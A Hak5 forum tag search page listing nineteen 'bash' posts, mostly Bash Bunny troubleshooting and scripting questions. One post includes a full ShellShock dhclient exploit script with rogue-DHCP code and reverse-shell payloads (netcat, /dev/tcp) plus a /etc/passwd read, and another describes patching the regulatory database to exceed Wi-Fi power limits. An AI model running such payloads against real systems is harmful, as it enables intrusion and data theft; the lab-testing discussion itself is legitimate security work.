Jump to content
Hak5 Forums

Search the Community

Showing results for tags 'bash'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Bash Bunny
    • Packet Squirrel
    • LAN Turtle
    • USB Rubber Ducky
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Found 19 results

  1. I have been troubleshooting issues with the bashbunny for as long as it has been available. I got mine as soon as it was released; and it has been nothing but problematic from day one; which is a shame. The device, in theory, is probably the best thing Hak5 has ever come out with; but it practice, it has been the least usable in my experience. Many payloads will not run consistently; if they run properly at all. Every payload that makes use of the USB partition (the one thing that should really allow us to accomplish truly amazing feats) is problematic for many of its customers. The bashbunny forum is littered with threads full of people who cannot get any credential payloads to work because USB writing fails; among other problems. Simple ducky payloads that execute fine on the ducky or on nethunter's duckhunter will not inject properly a fair percentage of the time on the bashbunny. I see mixed character case issues where they shouldn't be and other anomalies. I am really hoping the USB corruption issues and the bizarre injection problems I am having is due solely to the fact that I adopted so early and the rest of the devices are not plagued with these issues; as they make the device unusable. I am pleading with Hak5 support here to please provide me with a replacement. I and my friends have poured countless hours of time and ulcers into trying to get this device to work; with, very little and, no lasting success. Anything we get to to work once or twice is quickly broken by yet another USB corruption issue or other strange injection anomaly. Please help me. I have gone through every unbricking, reflashing, updating, and udisk reformatting operation that support has given and have tried every firmware available. Nothing seems to be able to salvage this bunny. Help me technolust-ken-obee. You're my only hope...
  2. I am trying to create a script which uploads a file to a computer, I want the script called "payload.txt" to check if the file has been uploaded to the directory specified on the computer.
  3. QuickCreds

    Hi everybody, I just flashed my bash bunny to the new 1.3 version of the firmware. I would like to test the QuickCreds payload on my windows 10 Enterprise. It seems to be stuck in yellow mode (LED ATTACK) forever. Responder is correctly installed into the tools folder. In loot/QuickCreds i have a good folder name but nothing into it. I m doing something wrong ? i have noticed some few thins like, in the payload , it is using the -P option but responder.py doesn 't have it, i erased it, but nothing change. Any ideas ? The thing is, before i just change the LED color , when i tried QuickCreds, after the setup light it was directly the blinking green ligh (i didn't get the yellow one, that's why i would like to test it). After i modified those LED instruction (juste the LED i promes) , the payload always stay in yellow mode. Thanks in advance for your support :-)
  4. Hi all, I am creating some shell scripts that occasionally need to use an external Alfa WiFi card, but not all of the time. Rather than leaving the Alfa card enabled constantly, I would like the script to bring the card online when it is required, and switch it back off when it is not. I have read various methods to do this online, but none seem definitive, so I would like to ask which method I should use. So far, I have seen suggestions of; Using WLAN# up and WLAN# down Disabling USB ports using Hub-CTRL Using hardware add-ons This or this (unknown what is being done here) Even people saying it's not possible. What would you suggest? Has anyone else had any luck with switching off and back on an Alfa Wifi Card from a Linux command line/script? I haven't yet played around, as I'm not at home, but I don't want to waste my time trying a method that won't work as well as something else. Thank you.
  5. Hi I had known about shellshock exploit. I want to test it and download dhclient python file from www.exploit-db.com. I modified a little the python file and run in ubuntu 16.04 which has virtual box . The victim is Ubuntu 14.04 in virtual box. But I did not succeed. Following are my code. #!/usr/bin/python # Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC # Date: 2014-09-29 # Author: @fdiskyou # e-mail: rui at deniable.org # Version: 4.1 # Tested on: Debian, Ubuntu, Kali # CVE: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187 from scapy.all import * conf.checkIPaddr = False fam,hw = get_if_raw_hwaddr(conf.iface) victim_assign_ip = "192.168.56.102" server_ip = "192.168.56.1" gateway_ip = "192.168.56.1" subnet_mask = "255.255.255.0" dns_ip = "8.8.8.8" spoofed_mac = "0a:00:27:00:00:00" payload = "() { ignored;}; echo 'moo'" payload_2 = "() { ignored;}; /bin/nc -e /bin/bash 192.168.56.1 4444" payload_3 = "() { ignored;}; /bin/bash -i >& /dev/tcp/192.168.56.1/4444 0>&1 &" payload_4 = "() { ignored;}; /bin/cat /etc/passwd" payload_5 = "() { ignored;}; /usr/bin/wget http://google.com" #rce=payload_5 rce= "() {:;}; exec 5<>/dev/tcp/192.168.56.1/4444 && cat <&5 | while read line; do $line 2>&5 >&5 ; done" #rce= "(){ ignored;}; /bin/bash -c 'gnome-screensaver-command --lock'" def toMAC(strMac): cmList = strMac.split(":") hCMList = [] for iter1 in cmList: hCMList.append(int(iter1, 16)) hMAC = struct.pack('!B', hCMList[0]) + struct.pack('!B', hCMList[1]) + struct.pack('!B', hCMList[2]) + struct.pack('!B', hCMList[3]) + struct.pack('!B', hCMList[4]) + struct.pack('!B', hCMList[5]) return hMAC def detect_dhcp(pkt): # print 'Process ', ls(pkt) if DHCP in pkt: # if DHCP Discover then DHCP Offer if pkt[DHCP].options[0][1]==1: clientMAC = pkt[Ether].src print "DHCP Discover packet detected from " + clientMAC sendp( Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/ IP(src=server_ip,dst="255.255.255.255")/ UDP(sport=67,dport=68)/ BOOTP( op=2, yiaddr=victim_assign_ip, siaddr=server_ip, giaddr=gateway_ip, chaddr=toMAC(clientMAC), xid=pkt[BOOTP].xid, sname=server_ip )/ DHCP(options=[('message-type','offer')])/ DHCP(options=[('subnet_mask',subnet_mask)])/ DHCP(options=[('name_server',dns_ip)])/ DHCP(options=[('lease_time',43200)])/ DHCP(options=[('router',gateway_ip)])/ DHCP(options=[('dump_path',rce)])/ DHCP(options=[('server_id',server_ip),('end')]), iface="vboxnet0" ) print "DHCP Offer packet sent" # if DHCP Request than DHCP ACK if pkt[DHCP] and pkt[DHCP].options[0][1] == 3: clientMAC = pkt[Ether].src print "DHCP Request packet detected from " + clientMAC sendp( Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/ IP(src=server_ip,dst="255.255.255.255")/ UDP(sport=67,dport=68)/ BOOTP( op=2, yiaddr=victim_assign_ip, siaddr=server_ip, giaddr=gateway_ip, chaddr=toMAC(clientMAC), xid=pkt[BOOTP].xid )/ DHCP(options=[('message-type','ack')])/ DHCP(options=[('subnet_mask',subnet_mask)])/ DHCP(options=[('lease_time',43200)])/ DHCP(options=[('router',gateway_ip)])/ DHCP(options=[('name_server',dns_ip)])/ DHCP(options=[('dump_path',rce)])/ DHCP(options=[('server_id',server_ip),('end')]), iface="vboxnet0" ) print "DHCP Ack packet sent" def main(): #sniff DHCP requests sniff(filter="udp and (port 67 or 68)", prn=detect_dhcp, iface="vboxnet0") if __name__ == '__main__': sys.exit(main()) And I run this on my host OS. nc -lvp 4444 Please help me to find the error.
  6. Firmware update troubles

    Im having some issues updating the bash bunny to the most recent firmware. I am currently on the base firmware from when I have purchased the device and have run apt-get update && apt-get upgrade after getting internet with my linux machine. I then download the firmware .tar file from the downloads area and copy the file to the / directory of the bash bunny. I then safely eject the device in arming mode and plug it back in expecting to see a red blinking light. Unfortunately it does nothing and boots to the regular storage mode and nothing has changed. I have searched the forums for help but I can't seem to figure out why this is happening. Can someone help me out with this issue?
  7. Hi all, I'm a newbie to Hak5 Forums, so if this thread is in the wrong category, it would be great if the admins could move it to the correct category. Most of you are probably using 'BO' as the region for 'iw' on Linux. This allows the WiFi interface to operate at 30dBm (1 Watt) at max. However, if you're like me and have a device that is capable of transmitting over 1W (I have Alpha Network AWUS036NH - 2W), you might be interested in increasing the TX power beyond 30dBm. By default, selecting 'BO' as the region only allows the device to operate at a maximum of 30dBm. I tested this on my Raspberry Pi 3, Model B running Kali Linux (with the kali-linux-full metapackage). *** If you are lazy and don't want to follow these manual steps below, I made two bash scripts that will work on Kali Linux and Ubuntu : https://github.com/hiruna/wifi-txpower-unlocker Working directory: /root Steps: 1. Update and upgrade apt-get update apt-get upgrade 2. Install dependencies to compile apt-get install pkg-config libnl-3-dev libgcrypt11-dev libnl-genl-3-dev build-essential 3. Download the latest Central Regulatory Domain Agent (CRDA) and Wireless Regulatory Database I downloaded crda-3.18.tar.xz and wireless-regdb-2017.03.07.tar.xz wget https://www.kernel.org/pub/software/network/crda/crda-3.18.tar.xz wget https://www.kernel.org/pub/software/network/wireless-regdb/wireless-regdb-2017.03.07.tar.xz 4. Unzip the downloaded files tar xvJf crda-3.18.tar.xz tar xvJf wireless-regdb-2017.03.07.tar.xz 5. Navigate into wireless-regdb-2017.03.07 cd wireless-regdb-2017.03.07 6. Open db.txt and locate the region BO section nano db.txt You will see something like this: country BO: DFS-JP (2402 - 2482 @ 40), (30) (5250 - 5330 @ 80), (30), DFS (5735 - 5835 @ 80), (30) The number in the second set of brackets (for each frequency) is the txpower. Since I'm using the 2.4Ghz and want a txpower of 2W (~33dBm), I changed the 20 to 33, and saved the file: country BO: DFS-JP (2402 - 2482 @ 40), (33) (5250 - 5330 @ 80), (30), DFS (5735 - 5835 @ 80), (30) I also noticed that region AU allows 36dBm for 2.4Ghz, so you could just continue without modifying the region BO: country AU: DFS-ETSI (2400 - 2483.5 @ 40), (36) (5150 - 5250 @ 80), (23), NO-OUTDOOR, AUTO-BW (5250 - 5350 @ 80), (20), NO-OUTDOOR, AUTO-BW, DFS (5470 - 5600 @ 80), (27), DFS (5650 - 5730 @ 80), (27), DFS (5730 - 5850 @ 80), (36) (57000 - 66000 @ 2160), (43), NO-OUTDOOR However, I checked with Kali Linux (without compiling and changing the regulatory.bin) and it showed that max txpower was only 20dBm: country AU: DFS-ETSI (2402 - 2482 @ 40), (N/A, 20), (N/A) (5170 - 5250 @ 80), (N/A, 17), (N/A), AUTO-BW (5250 - 5330 @ 80), (N/A, 24), (0 ms), DFS, AUTO-BW (5490 - 5710 @ 160), (N/A, 24), (0 ms), DFS (5735 - 5835 @ 80), (N/A, 30), (N/A) So I'm assuming Kali Linux is using an old regulatory.bin and legislation in AU has changed. 7. Compile make 8. Backup up your old regulatory.bin file and move the new file into /lib/crda mv /lib/crda/regulatory.bin /lib/crda/regulatory.bin.old mv regulatory.bin /lib/crda As mentioned in https://wireless.wiki.kernel.org/en/developers/regulatory/crda and https://wireless.wiki.kernel.org/en/developers/regulatory/wireless-regdb, we need to include RSA public keys in crda-3.18/pubkeys. I noticed that there are already 2 .pem files in crda-3.18/pubkeys: sforshee.key.pub.pem linville.key.pub.pem 9. Copy root.key.pub.pem into crda-3.18/pubkeys. I also copied sforshee.key.pub.pem from wireless-regdb-2017.03.07 as it was newer: cp root.key.pub.pem ../crda-3.18/pubkeys/ cp sforshee.key.pub.pem ../crda-3.18/pubkeys/ I found that there are two other pubkeys located at /lib/crda : -rw-r--r-- 1 root root 451 Jan 18 12:58 [email protected] -rw-r--r-- 1 root root 451 Jan 18 12:58 linville.key.pub.pem -rw-r--r-- 1 root root 451 Jan 18 12:58 sforshee.key.pub.pem So I copied them too (wasn't too sure whether I needed to copy them): cp /lib/crda/pubkeys/benh\@debian.org.key.pub.pem ../crda-3.18/pubkeys/ cp /lib/crda/pubkeys/linville.key.pub.pem ../crda-3.18/pubkeys/ 10. Navigate into crda-3.18 and open the Makefile cd ../crda-3.18 nano Makefile In Kali Linux, crda is located at /lib/crda instead of /usr/bin/crda, so in the file change the 3rd line REG_BIN?=/usr/lib/crda/regulatory.bin to REG_BIN?=/lib/crda/regulatory.bin : REG_BIN?=/lib/crda/regulatory.bin 11. In the Makefile, find the line CFLAGS += -std=gnu99 -Wall -Werror -pedantic and remove the -Werror option (I couldn't compile without changing it as it treats warnings as errors): CFLAGS += -std=gnu99 -Wall -pedantic 12. Compile make clean make make install That's it! I rebooted my Raspberry Pi after compiling. reboot 13. Now let's change the region and set the txpower to 33dBm: ifconfig wlan1 down iw reg set BO iwconfig wlan1 txpower 33 ifconfig wlan1 up
  8. Hi guys, So I'm trying to call a shell script (.sh) from inside the payload.txt file (like install.sh or a.sh), but everything I have tried has come to nuttin'. I've tried things like this: chmod +x ./test.sh ./test.sh chmod +x ./test.sh bash ./test.sh chmod +x ./test.sh sh ./test.sh chmod +x ./test.sh source ./test.sh chmod +x ./test.sh ( "./test.sh" ) But none are working. I have the '#!/bin/bash' shebang on the first line of the shell script AND the payload.txt, and the shell script is in the same directory as the payload.txt. EDIT: I did also try removing the './' from the chmod call when I specify the filename. Any ideas on how to call on another script from the payload script?
  9. Bash Bunny: Problem [Unsolved]

    Apparently I've tried to update to 1.1 incorrectly. It has a solid green on startup then it turns blank. After three times it goes into recovery mode I am assuming. Then once there it blinks red for a while. Then it turns blank again. I've waited ten minutes tried to replug it in assuming something went wrong it it was done. But it never blinks or goes solid green or blue after the red blinking. But just now It was blinking red then started to alternate red to blue. Now it's blank again, I will wait another fifteen minutes before I try anything else. What exactly is going on? I am assuming it's either trying to recover then flash. I moved the upgrade contents to the root file system. I don't know exactly what went wrong. Easier way to understand the problem: Plug In > Solid Green > Blank LED ........ Ten minutes has passed.... Replug In > Solid Green > Blank LED ....... Ten minutes has passed.... Replug In > Solid Green Blank LED ...... Ten minutes has passed.... Replug In > Blinking Red > Couple of Minutes Passed > Blinking Red . Blinking Blue . Blinking Red > Couple of Minutes Passed > Blinking Red > Couple of Minutes Passed > BLANK LED!!!! Ten minutes has passed... Replug In > Solid Green > Blank LED Every time it tries to recover then it will try to boot three times and try to recover again. It will never fully boot up nor will Kali recognize the file system or that it's plugged in.
  10. Basically up until the 1.1 release update the ducky commands were working perfectly. But now the only language which it can use is US (which is a problem as i live in UK). I have tried everything and looked everywhere on the forums but no luck. As I said it worked before the update so there probably is an easy fix, but any help would be appreciated....
  11. Basically up until the 1.1 release update the ducky commands were working perfectly. But now the only language which it can use is US (which is a problem as i live in UK). I have tried everything and looked everywhere on the forums but no luck. As I said it worked before the update so there probably is an easy fix, but any help would be appreciated....
  12. Payloads not working?

    Hey guys? I have been trying the executable installer and usb exfiltrator for bash bunny but it's not working. The only payload that is working is the quickcreds payload. Is it because I installed the tools that the executable installer and usb exfiltrator are not working? I made sure that the "d.cmd", "e.cmd" and "i.vbs" files are in the ROOT of the the bashbunny and the "payload.txt" is in the "switch1" of the Bash Bunny. What is going on? Please help.
  13. Hi all, I have multiple wireless devices connected to one computer and I'm trying to create a BASH script to find the LogicalName of one of them automatically. For example, I have WLAN0, WLAN1 and WLAN2 connected. I want to find the LogicalName for my 'Super Awesome WiFi Thingy'. So far I have been unable to find a line of BASH that will take the Device Name 'Super Awesome WiFi Thingy' and find which WLAN LogicalName it belongs to. Any ideas? *Edit* I need to output to a variable in format 'WLAN#', rather than just display a list of devices. Thank you.
  14. ADB on Bunny

    How would I go about getting an ARM version of ADB working on the bash bunny? I tried using Google's Python implementation of ADB, but it required libusb1 and other dependencies. The goal is to make a payload that: Enabled USB debugging (HID) Accepts connection to device (HID) ADB Install's package (bash) ADB launches package (bash) I had the HID payload working for enabling USB debugging, but then realized ADB was for x64 processors. I found a couple ARM versions, but couldn't get any of them working properly. Can anyone help me out with this. Ideally, I would like to utilize my apkwash script (https://github.com/jbreed/apkwash) to generate a lightweight payload to use for pushing onto a device. With ADB you can also attempt gaining root as well through ADB methods that otherwise wouldn't be accessible.
  15. [Upgrade] Dynamic Switching

    So, I've made a payload to upgrade the bash bunny to allow for switching on the fly. I'm not posting it yet, because it seems that the PRs are piling up and don't want it lost in the shuffle. i currently have it so that it runs the payload on the switch you switch it to, but feel it could eventually be used to register commands to the script. Would anyone find this useful? Any ideas on other uses detecting the switches could do?
  16. Mounting the computer drive?

    is it possible to mount say a ntfs (windows) from your computer through say the serial connection? this is what i get with lsblk through serial console or maybe a way to directly boot into the linux distro at startup without putting another distro on the storage..?
  17. Sometime when you need to map networks, for example when you gain access to a LAN server without security tools on it, it can be useful to retrieve reverses dns for a specified internal PI. You can do it directly in bash with this short command line (example for 192.168.1.0/24) : seq 1 254 |xargs -I{} -n 1 host 192.168.1.{} It also works fine on a public PI of course. Don't hesitate to share your tips too :) -- Christophe Casalegno https://twitter.com/Brain0verride
  18. Salutations Hak5, I'm S0AndS0 a long time watcher (and big fan) of the various shows that have been made available by the Hak5 teem. What is shared here maybe thought of as a "tricky treat" for the holiday. https://github.com/S0AndS0/Perinoid_Pipes The above project has been documented in detail (because we've heard that the show hosts of Hak5 like that out of project authors) and as of latest local & remote tests is operating as expected. Simply put this project facilitates common encryption & decryption options of GnuPG via a named pipe (similar to anonymous pipes `|` but addressable via file path) and a customized listening loop that parses incoming data. Think of it as a *short-cut* for operations involving public key crypto; for example of normal encryption echo "some secret" | gpg -a -e [email protected] >> out.file And for comparison an example of encrypting via named pipe file echo "some secret" > /var/log/named.pipe This allows any service to utilize encryption by way of output redirection; logging daemons, web host logging, and/or your own custom services. So far three usage scenarios have been written but we're hoping that with this communities' help we can write at least two more together; perhaps a guide on using this tool with Rubber Ducky to automatically encrypt data off a target to either a second storage device or to the Ducky it's self. Notes for beginners; If you (the reader) are new or unfamiliar with encryption via GnuPG then ya may want to start with the documents in above code repo that begin with `Gnupg_` after coming to terms with the options available then check the script's help documentation via the following commands chmod u+x Paranoid_Pipes ./Paranoid_Pipes --help Use the output from above to modify your next commands, add `--help` at the end to check your settings prior to committing to them. Easy as pie. Notes for Moderators; If this has been posted in the wrong section please move or notify the OP's author to move it to the proper section. This tool has been shared with the this community in the hopes that readers will find it useful but without warranties of any kind. Notes for Show Hosts; If you wish to include this tool within a publication then you have permission, prematurely given, to utilize any of the tools found in the above code repository for either your own projects or for featuring the main project itself.
  19. I really loved the last two episodes on creating a VPN. I have a Wifi Pineapple Nano and have setup a VPN server and can manually connect . I used the forwarding 'foo' code in the video to get client forwarding working. Now I wanted to make it so that the openvpn client and the forwarding script works on startup but I cannot seem to get it working. I've done some searching but cannot think of where to go from here. I've put this in /etc/init.d/ #!/bin/sh # Start the openvpn service openvpn client.ovpn #Setup forwarding for clients iptables -t nat -A POSTROUTING -s 172.16.42.0/24 -o tun0 -j MASQUERADE iptables -A FORWARD -s 172.16.42.0/24 -o tun0 -j ACCEPT iptables -A FORWARD -d 172.16.42.0/24 -m state --state ESTABLISHED,RELATED -i tun0 -j ACCEPT And created a symlink to /etc/rc.d/ If I run the commands separately it all works however I cannot get it to run on boot. Should they be run as two different processes? Is it because openvpn is running the second won't trigger. Not sure if it's my lack of understanding of Unix/bash scripting or something else. Thanks for your time guys.
×